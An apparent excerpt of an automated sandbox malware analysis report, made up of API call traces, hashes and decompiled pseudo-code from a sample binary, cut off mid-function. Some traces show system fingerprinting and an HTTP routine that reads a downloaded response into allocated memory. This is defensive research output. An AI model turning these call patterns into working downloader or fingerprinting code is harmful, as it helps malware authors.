                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86e148b133b59b96048caeecde11733302bddb6ec3e6be266adfd6776523adf3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AA19671900259ABDB21DBA4CD84BEEBBBAFF55310F504498F189AB580D7F45DC4CB21
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 0252A7BE
                                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 0252A7D0
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C8E8), ref: 0252A7F5
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C8F0), ref: 0252A81B
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C930), ref: 0252A904
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C938), ref: 0252A927
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C948), ref: 0252A956
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C958), ref: 0252A979
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C960), ref: 0252A9A5
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C970), ref: 0252A9C8
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C978), ref: 0252A9E9
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 0252A9F6
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C980), ref: 0252AA09
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 0252AA1A
                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 0252AA24
                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,0400C984), ref: 0252AA3C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3139318632-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a5e30b84ce4ac81bb781eac5b31e593703bb3f3dedbf034873891d46f711d5e6
                                                                                                                                                                                                                                                                                          • Instruction ID: a44799ae8fbf6eef4e4544e06630d10ef94bb314a0f94fc5eb7836a8b9535543
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5e30b84ce4ac81bb781eac5b31e593703bb3f3dedbf034873891d46f711d5e6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7816C74504269EBFB289F60C849BAD7B75FB06301F008659F945BA2C0D778D9C9CFA4
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 025230C9
                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(0400C2CC,00000001,00000000,00000000,00000000), ref: 025230E4
                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0252311D
                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,0400C304,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 0252315B
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 02523189
                                                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 025231A4
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 025231DD
                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02523234
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02523260
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 025232CE
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 0252331E
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 02523386
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02523404
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 0252343C
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02523449
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02523456
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: 0u$<
                                                                                                                                                                                                                                                                                          • API String ID: 880997049-1574047783
                                                                                                                                                                                                                                                                                          • Opcode ID: c414b28dcc46312f03040d757c113d134bcc881009854cc6b25f51f376501bb5
                                                                                                                                                                                                                                                                                          • Instruction ID: 723785be5bc0ad57aed5dcdb6f80d12a0be35e043e48ac70550757f84263fec0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c414b28dcc46312f03040d757c113d134bcc881009854cc6b25f51f376501bb5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CC1FDB19442289BEB24CF50CC49BD977B5FB85704F0041D9E60DA62C0DB7AAE94CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                          			E000FA4A0(void* __ecx, int _a4, signed short _a8) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                                                                                                                          				int _v80;
                                                                                                                                                                                                                                                                                          				char _v600;
                                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                                          				void* _v608;
                                                                                                                                                                                                                                                                                          				int _v612;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v616;
                                                                                                                                                                                                                                                                                          				intOrPtr _v620;
                                                                                                                                                                                                                                                                                          				CHAR* _v624;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v628;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _v632;
                                                                                                                                                                                                                                                                                          				int _v636;
                                                                                                                                                                                                                                                                                          				long _v640;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				signed int _t75;
                                                                                                                                                                                                                                                                                          				signed short _t78;
                                                                                                                                                                                                                                                                                          				CHAR* _t79;
                                                                                                                                                                                                                                                                                          				struct HRSRC__* _t80;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t81;
                                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                                          				long _t86;
                                                                                                                                                                                                                                                                                          				long _t90;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t97;
                                                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                                                          				signed short _t107;
                                                                                                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                                                                                                          				short* _t124;
                                                                                                                                                                                                                                                                                          				void* _t127;
                                                                                                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                                                                                                          				signed short _t139;
                                                                                                                                                                                                                                                                                          				signed short _t143;
                                                                                                                                                                                                                                                                                          				intOrPtr _t149;
                                                                                                                                                                                                                                                                                          				void* _t150;
                                                                                                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                                                                                                          				void* _t158;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t160;
                                                                                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t164;
                                                                                                                                                                                                                                                                                          				signed int _t167;
                                                                                                                                                                                                                                                                                          				void* _t175;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F4BB);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t74 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t75 = _t74 ^ _t167;
                                                                                                                                                                                                                                                                                          				_v20 = _t75;
                                                                                                                                                                                                                                                                                          				_push(_t75);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t160 =  *0x170c0c;
                                                                                                                                                                                                                                                                                          				_v612 = _a4;
                                                                                                                                                                                                                                                                                          				_t78 = _a8;
                                                                                                                                                                                                                                                                                          				_v632 = _t78;
                                                                                                                                                                                                                                                                                          				_t79 = _t78 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          				_v608 = __ecx;
                                                                                                                                                                                                                                                                                          				_v628 = _t160;
                                                                                                                                                                                                                                                                                          				_v624 = _t79;
                                                                                                                                                                                                                                                                                          				_t80 = FindResourceA(_t160, _t79, 0xf1);
                                                                                                                                                                                                                                                                                          				if(_t80 == 0) {
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					_t81 = 0;
                                                                                                                                                                                                                                                                                          					L31:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					_pop(_t157);
                                                                                                                                                                                                                                                                                          					_pop(_t161);
                                                                                                                                                                                                                                                                                          					_pop(_t127);
                                                                                                                                                                                                                                                                                          					return E001059E6(_t81, _t127, _v20 ^ _t167, _t148, _t157, _t161);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t83 = LoadResource(_t160, _t80);
                                                                                                                                                                                                                                                                                          				if(_t83 == 0) {
                                                                                                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t158 = LockResource(_t83);
                                                                                                                                                                                                                                                                                          				if(_t158 == 0) {
                                                                                                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v636 =  *(_t158 + 6) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          				_v604 = 0;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_t86 = E000FFEA0( *(_t158 + 6) & 0x0000ffff, _t158,  &_v604);
                                                                                                                                                                                                                                                                                          				_v640 = _t86;
                                                                                                                                                                                                                                                                                          				if(_t86 != 0) {
                                                                                                                                                                                                                                                                                          					_t149 = 0;
                                                                                                                                                                                                                                                                                          					_t133 = 0;
                                                                                                                                                                                                                                                                                          					_v620 = 0;
                                                                                                                                                                                                                                                                                          					if(0 >=  *(_t158 + 6)) {
                                                                                                                                                                                                                                                                                          						L15:
                                                                                                                                                                                                                                                                                          						_t148 = _v612;
                                                                                                                                                                                                                                                                                          						_t164 = CreateWindowExA(0, "ToolbarWindow32", 0, 0x5600094c, 0, 0, 0x64, 0x64, _v612, _v608,  *0x170c08, 0);
                                                                                                                                                                                                                                                                                          						if(_t164 != 0) {
                                                                                                                                                                                                                                                                                          							SendMessageA(_t164, 0x41e, 0x14, 0);
                                                                                                                                                                                                                                                                                          							_t90 = SendMessageA(_t164, 0x31, 0, 0);
                                                                                                                                                                                                                                                                                          							_v608 = _t90;
                                                                                                                                                                                                                                                                                          							if(_t90 == 0) {
                                                                                                                                                                                                                                                                                          								_v608 = GetStockObject(0x11);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v80 = 0;
                                                                                                                                                                                                                                                                                          							E00106820( &_v76, 0, 0x38);
                                                                                                                                                                                                                                                                                          							_t150 =  &_v80;
                                                                                                                                                                                                                                                                                          							GetObjectA(_v608, 0x3c, _t150);
                                                                                                                                                                                                                                                                                          							asm("cdq");
                                                                                                                                                                                                                                                                                          							_t97 =  *0x170c0c;
                                                                                                                                                                                                                                                                                          							_v608 = (_v80 ^ _t150) - _t150 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_v612 = _t97;
                                                                                                                                                                                                                                                                                          							_t102 =  *(LockResource(LoadResource(_v612, FindResourceA(_t97, _v624, 2))) + 0xe) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							if(_t102 <= 4) {
                                                                                                                                                                                                                                                                                          								_v616 = _v628;
                                                                                                                                                                                                                                                                                          								_push( &_v616);
                                                                                                                                                                                                                                                                                          								_push(_v620);
                                                                                                                                                                                                                                                                                          								_v612 = 0;
                                                                                                                                                                                                                                                                                          								_v612 = _v632;
                                                                                                                                                                                                                                                                                          								_push(0x413);
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t146 = 0xff000000;
                                                                                                                                                                                                                                                                                          								if(_t102 == 0x20) {
                                                                                                                                                                                                                                                                                          									_t146 = 0xffffffffffffffff;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_push(ImageList_LoadImageA( *0x170c0c, _v624,  *(_t158 + 2) & 0x0000ffff, 1, _t146, 0, 0x2040));
                                                                                                                                                                                                                                                                                          								_push(0);
                                                                                                                                                                                                                                                                                          								_push(0x430);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							SendMessageA(_t164, ??, ??, ??);
                                                                                                                                                                                                                                                                                          							SendMessageA(_t164, 0x414, _v636, _v640);
                                                                                                                                                                                                                                                                                          							_t107 =  *(_t158 + 4) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_t139 = _v608;
                                                                                                                                                                                                                                                                                          							if(_t107 <= _t139) {
                                                                                                                                                                                                                                                                                          								_t107 = _t139 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							SendMessageA(_t164, 0x420, 0, (_t107 & 0x0000ffff) << 0x00000010 |  *(_t158 + 2) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          							_t109 =  *(_t158 + 4) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							_t143 = _v608;
                                                                                                                                                                                                                                                                                          							if(_t109 <= _t143) {
                                                                                                                                                                                                                                                                                          								_t109 = _t143 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t148 =  *(_t158 + 2) + 0x00000007 & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							SendMessageA(_t164, 0x41f, 0, (_t109 + 0x00000007 & 0x0000ffff) << 0x00000010 |  *(_t158 + 2) + 0x00000007 & 0x0000ffff);
                                                                                                                                                                                                                                                                                          							if(_v604 !=  &_v600) {
                                                                                                                                                                                                                                                                                          								E000FD040( &_v604);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t81 = _t164;
                                                                                                                                                                                                                                                                                          							goto L31;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                                                                                                          						if(_t175 != 0) {
                                                                                                                                                                                                                                                                                          							E000FD040( &_v604);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t124 = _t86 + 8;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						if( *(_t158 + 8 + _t133 * 2) == 0) {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t124 - 8)) = 8;
                                                                                                                                                                                                                                                                                          							 *(_t124 - 4) = 0;
                                                                                                                                                                                                                                                                                          							 *_t124 = 0x100;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t124 - 8)) = _t149;
                                                                                                                                                                                                                                                                                          							_t149 = _t149 + 1;
                                                                                                                                                                                                                                                                                          							 *(_t124 - 4) =  *(_t158 + 8 + _t133 * 2) & 0x0000ffff;
                                                                                                                                                                                                                                                                                          							 *_t124 = 4;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t124 + 8)) = 0;
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t124 + 4)) = 0;
                                                                                                                                                                                                                                                                                          						_t133 = _t133 + 1;
                                                                                                                                                                                                                                                                                          						_t124 = _t124 + 0x14;
                                                                                                                                                                                                                                                                                          					} while (_t133 < ( *(_t158 + 6) & 0x0000ffff));
                                                                                                                                                                                                                                                                                          					_v620 = _t149;
                                                                                                                                                                                                                                                                                          					goto L15;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t148 =  &_v600;
                                                                                                                                                                                                                                                                                          				_t175 = _v604 -  &_v600;
                                                                                                                                                                                                                                                                                          				goto L5;
                                                                                                                                                                                                                                                                                          			}

















































                                                                                                                                                                                                                                                                                          0x000fa4a3
                                                                                                                                                                                                                                                                                          0x000fa4a5
                                                                                                                                                                                                                                                                                          0x000fa4b0
                                                                                                                                                                                                                                                                                          0x000fa4b7
                                                                                                                                                                                                                                                                                          0x000fa4bc
                                                                                                                                                                                                                                                                                          0x000fa4be
                                                                                                                                                                                                                                                                                          0x000fa4c4
                                                                                                                                                                                                                                                                                          0x000fa4c8
                                                                                                                                                                                                                                                                                          0x000fa4d1
                                                                                                                                                                                                                                                                                          0x000fa4d7
                                                                                                                                                                                                                                                                                          0x000fa4dd
                                                                                                                                                                                                                                                                                          0x000fa4e0
                                                                                                                                                                                                                                                                                          0x000fa4e6
                                                                                                                                                                                                                                                                                          0x000fa4f0
                                                                                                                                                                                                                                                                                          0x000fa4f6
                                                                                                                                                                                                                                                                                          0x000fa4fc
                                                                                                                                                                                                                                                                                          0x000fa502
                                                                                                                                                                                                                                                                                          0x000fa50c
                                                                                                                                                                                                                                                                                          0x000fa568
                                                                                                                                                                                                                                                                                          0x000fa568
                                                                                                                                                                                                                                                                                          0x000fa7b0
                                                                                                                                                                                                                                                                                          0x000fa7b3
                                                                                                                                                                                                                                                                                          0x000fa7bb
                                                                                                                                                                                                                                                                                          0x000fa7bc
                                                                                                                                                                                                                                                                                          0x000fa7bd
                                                                                                                                                                                                                                                                                          0x000fa7cb
                                                                                                                                                                                                                                                                                          0x000fa7cb
                                                                                                                                                                                                                                                                                          0x000fa510
                                                                                                                                                                                                                                                                                          0x000fa518
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fa521
                                                                                                                                                                                                                                                                                          0x000fa525
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fa52b
                                                                                                                                                                                                                                                                                          0x000fa531
                                                                                                                                                                                                                                                                                          0x000fa53d
                                                                                                                                                                                                                                                                                          0x000fa540
                                                                                                                                                                                                                                                                                          0x000fa545
                                                                                                                                                                                                                                                                                          0x000fa54d
                                                                                                                                                                                                                                                                                          0x000fa56f
                                                                                                                                                                                                                                                                                          0x000fa573
                                                                                                                                                                                                                                                                                          0x000fa575
                                                                                                                                                                                                                                                                                          0x000fa57f
                                                                                                                                                                                                                                                                                          0x000fa5c5
                                                                                                                                                                                                                                                                                          0x000fa5d0
                                                                                                                                                                                                                                                                                          0x000fa5f2
                                                                                                                                                                                                                                                                                          0x000fa5f6
                                                                                                                                                                                                                                                                                          0x000fa612
                                                                                                                                                                                                                                                                                          0x000fa61d
                                                                                                                                                                                                                                                                                          0x000fa623
                                                                                                                                                                                                                                                                                          0x000fa62b
                                                                                                                                                                                                                                                                                          0x000fa635
                                                                                                                                                                                                                                                                                          0x000fa635
                                                                                                                                                                                                                                                                                          0x000fa642
                                                                                                                                                                                                                                                                                          0x000fa645
                                                                                                                                                                                                                                                                                          0x000fa653
                                                                                                                                                                                                                                                                                          0x000fa65a
                                                                                                                                                                                                                                                                                          0x000fa663
                                                                                                                                                                                                                                                                                          0x000fa673
                                                                                                                                                                                                                                                                                          0x000fa67a
                                                                                                                                                                                                                                                                                          0x000fa680
                                                                                                                                                                                                                                                                                          0x000fa6a1
                                                                                                                                                                                                                                                                                          0x000fa6a8
                                                                                                                                                                                                                                                                                          0x000fa6f3
                                                                                                                                                                                                                                                                                          0x000fa6ff
                                                                                                                                                                                                                                                                                          0x000fa700
                                                                                                                                                                                                                                                                                          0x000fa701
                                                                                                                                                                                                                                                                                          0x000fa707
                                                                                                                                                                                                                                                                                          0x000fa70d
                                                                                                                                                                                                                                                                                          0x000fa6aa
                                                                                                                                                                                                                                                                                          0x000fa6aa
                                                                                                                                                                                                                                                                                          0x000fa6b2
                                                                                                                                                                                                                                                                                          0x000fa6b4
                                                                                                                                                                                                                                                                                          0x000fa6b4
                                                                                                                                                                                                                                                                                          0x000fa6d8
                                                                                                                                                                                                                                                                                          0x000fa6d9
                                                                                                                                                                                                                                                                                          0x000fa6da
                                                                                                                                                                                                                                                                                          0x000fa6da
                                                                                                                                                                                                                                                                                          0x000fa713
                                                                                                                                                                                                                                                                                          0x000fa72d
                                                                                                                                                                                                                                                                                          0x000fa733
                                                                                                                                                                                                                                                                                          0x000fa737
                                                                                                                                                                                                                                                                                          0x000fa740
                                                                                                                                                                                                                                                                                          0x000fa742
                                                                                                                                                                                                                                                                                          0x000fa742
                                                                                                                                                                                                                                                                                          0x000fa759
                                                                                                                                                                                                                                                                                          0x000fa75f
                                                                                                                                                                                                                                                                                          0x000fa763
                                                                                                                                                                                                                                                                                          0x000fa76c
                                                                                                                                                                                                                                                                                          0x000fa76e
                                                                                                                                                                                                                                                                                          0x000fa76e
                                                                                                                                                                                                                                                                                          0x000fa77f
                                                                                                                                                                                                                                                                                          0x000fa78f
                                                                                                                                                                                                                                                                                          0x000fa7a1
                                                                                                                                                                                                                                                                                          0x000fa7a9
                                                                                                                                                                                                                                                                                          0x000fa7a9
                                                                                                                                                                                                                                                                                          0x000fa7ae
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fa7ae
                                                                                                                                                                                                                                                                                          0x000fa55b
                                                                                                                                                                                                                                                                                          0x000fa55b
                                                                                                                                                                                                                                                                                          0x000fa563
                                                                                                                                                                                                                                                                                          0x000fa563
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fa55b
                                                                                                                                                                                                                                                                                          0x000fa581
                                                                                                                                                                                                                                                                                          0x000fa584
                                                                                                                                                                                                                                                                                          0x000fa589
                                                                                                                                                                                                                                                                                          0x000fa59e
                                                                                                                                                                                                                                                                                          0x000fa5a5
                                                                                                                                                                                                                                                                                          0x000fa5a8
                                                                                                                                                                                                                                                                                          0x000fa58b
                                                                                                                                                                                                                                                                                          0x000fa58b
                                                                                                                                                                                                                                                                                          0x000fa593
                                                                                                                                                                                                                                                                                          0x000fa594
                                                                                                                                                                                                                                                                                          0x000fa597
                                                                                                                                                                                                                                                                                          0x000fa597
                                                                                                                                                                                                                                                                                          0x000fa5ad
                                                                                                                                                                                                                                                                                          0x000fa5b0
                                                                                                                                                                                                                                                                                          0x000fa5b7
                                                                                                                                                                                                                                                                                          0x000fa5b8
                                                                                                                                                                                                                                                                                          0x000fa5bb
                                                                                                                                                                                                                                                                                          0x000fa5bf
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fa5bf
                                                                                                                                                                                                                                                                                          0x000fa54f
                                                                                                                                                                                                                                                                                          0x000fa555
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(000F0000,89044E8B,000000F1), ref: 000FA502
                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(000F0000,00000000,?,00000000), ref: 000FA510
                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,00000000), ref: 000FA51B
                                                                                                                                                                                                                                                                                          • CreateWindowExA.USER32 ref: 000FA5EC
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000041E,00000014,00000000), ref: 000FA612
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 000FA61D
                                                                                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 000FA62F
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FA645
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 000FA65A
                                                                                                                                                                                                                                                                                          • FindResourceA.KERNEL32(000F0000,?,00000002), ref: 000FA686
                                                                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,00000000), ref: 000FA694
                                                                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,00000000), ref: 000FA69B
                                                                                                                                                                                                                                                                                          • ImageList_LoadImageA.COMCTL32(000F0000,?,?,00000001,FF000000,00000000,00002040,?,?,00000000), ref: 000FA6D2
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000413,?,?), ref: 000FA713
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000414,00000000,?), ref: 000FA72D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000420,00000000,?), ref: 000FA759
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000041F,00000000,?), ref: 000FA78F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageResourceSend$Load$FindImageLockObject$CreateList_StockWindow_memset
                                                                                                                                                                                                                                                                                          • String ID: ToolbarWindow32
                                                                                                                                                                                                                                                                                          • API String ID: 325547664-4104838417
                                                                                                                                                                                                                                                                                          • Opcode ID: 73871c4f38c09b2457adb8046520a619a96b11970630c685e70fa3157b4f9b22
                                                                                                                                                                                                                                                                                          • Instruction ID: cc7e5f6ee6edeb7368361688fcb614b15edbefde48c978357298c08d437a1b18
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73871c4f38c09b2457adb8046520a619a96b11970630c685e70fa3157b4f9b22
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 529172B0A04628AFDB24DF14CC88ABAB7B8FB48701F10819AF649E7690D7745DC0DF64
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E000FB460(int** _a4) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				short _v23;
                                                                                                                                                                                                                                                                                          				intOrPtr _v27;
